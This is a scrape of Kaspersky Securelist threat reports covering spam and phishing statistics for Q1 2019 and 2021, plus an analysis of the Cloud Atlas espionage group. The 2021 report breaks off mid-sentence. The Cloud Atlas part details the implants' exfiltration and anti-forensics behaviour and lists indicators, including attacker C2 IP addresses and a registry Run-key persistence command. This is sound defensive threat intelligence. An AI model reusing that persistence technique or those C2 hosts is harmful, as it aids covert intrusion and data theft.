Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. **12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T15:27:23", "description": "\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their &quot;investment projects&quot; look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That&#x27;s how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they&#x27;d invite the &quot;customer&quot; to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn&#x27;t think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be &quot;processed&quot;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events &quot;streamed&quot; on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim&#x27;s trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, &quot;prize winners&quot; are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small &quot;commission fee&quot; to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient&#x27;s attention. The attackers&#x27; main objective was to trick the victim into following the link to a phishing page for entering login details. That&#x27;s why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of &quot;email Portal&quot; or another similar resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient&#x27;s guard and prompt them to enter the username and password for their corporate account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim&#x27;s bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There&#x27;s no guarantee that the code they&#x27;re selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to &quot;confirm&quot; their e-mail address by logging in to their account on the scam website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called &quot;Covid Test Result&quot;. Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe &quot;important message about vaccination&quot; which supposedly lay unread in a recipient&#x27;s inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a &quot;2 months salary receipt&quot; were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people&#x27;s desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country&#x27;s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users&#x27; personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a &quot;prize&quot; page but told to pay a small necessary &quot;commission fee&quot; in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim&#x27;s system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who&#x27;ve also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China&#x27;s rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world&#x27;s spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany&#x27;s. They&#x27;re followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It&#x27;s worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nMost of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they&#x27;re attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can&#x27;t say for sure that there&#x27;s a connection between Whatreg activity and phishing in this messaging app, but it&#x27;s a possibility. We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year&#x27;s main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. Fresh &quot;investment projects&quot; will replace their forerunners. &quot;Prize draws&quot; will alternate with holiday giveaways when there&#x27;s a special occasion to celebrate. Attacks on the corporate sector aren&#x27;t going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the 